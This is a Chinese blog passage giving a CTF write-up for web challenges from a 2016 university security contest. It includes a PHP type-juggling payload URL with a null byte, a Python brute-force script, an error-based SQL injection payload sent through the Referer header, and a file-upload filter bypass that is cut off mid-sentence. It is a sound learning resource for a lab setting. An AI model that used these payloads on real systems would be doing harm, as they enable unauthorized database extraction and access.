2016合天全国高校网安联赛专题赛--赛前指导练习题web进阶篇Writeup

本文详细介绍了2016年合天全国高校网安联赛中关于Web进阶的题目,包括源码分析、参数修改、PHP代码审计、HTTP头注入、文件上传漏洞、命令执行等,涉及多种解题技巧和安全漏洞利用。
摘要由CSDN通过智能技术生成

讲真,这次的题确实价值不很大,脑洞太多了,而且很多无意义的脑洞,不过个别题还可以,另外第16题和21题没有做出来,希望有做出来的菊苣给点hint

题目1

先看源码,然后看到可以链接Index.php

跟过去看到flag

A HIDDEN FLAG: FLAG{th!5!5n0tth3fl@g}

题目2

先用firefox把submit的disable去掉
然后勾选好抓包,把提交参数修改如下:

[object Object]

题目3

同样抓包,把cookie中的Member参数修改为Admin的base64的编码
这里写图片描述

题目4

一道简单php代码审计

payload如下:


http://218.76.35.75:20114/?foo={"bar1":"2017f","bar2":[[1,1],1,1,1,1]}&cat[0]=123&cat[1][]=1&dog=%00htctf2016

拿到flag


flag{php_i5_n0t_b4d}

题目5

bobsam的MD5解出来分别是bob317sam429,没有什么规律,写个脚本简单爆破一下slash后面的数字,


import requests

import hashlib

r=requests.session()

url="http://218.76.35.75:20115/index.php"

for i in xrange(1000):

    header={
  "User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"}

    param=hashlib.md5("slash"+str(i)).hexdigest()

    tmpurl=url+"?page="+param

    print tmpurl

    result=r.get(tmpurl,headers=header)

    content=result.content

    if 'flag' in content or 'Flag' in content or 'FLAG' in content:

        print content

        print i

        break

爆破出数字是723,脚本截图

这里写图片描述

题目6

根据提示,是http头的注入,那就把头全都试一遍,发现注入点在referer参数,然后简单试试,发现可以报错注入,懒得写脚本了,这里也没啥过滤,直接暴库就可以了。

爆出的数据库名为ctf

该数据库里面有flagvisits两张表

然后在flag表里面有idflag两列

最后的payload如下:

2',extractvalue(1,concat(0x3c,(select group_concat(id,"==",flag) from flag))))#

结果截图如下
这里写图片描述

题目7

看题目,随便先上传一个图片,提示

这里写图片描述

随便上传个php又提示说只要jpg文件,ssctf2016的原题一枚

参照乌云漏洞:http://www.wooyun.org/bugs/wooyun-2015-0125982

如下图,把multipart/form-data变换一下大小写,再把第二个Content-T

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值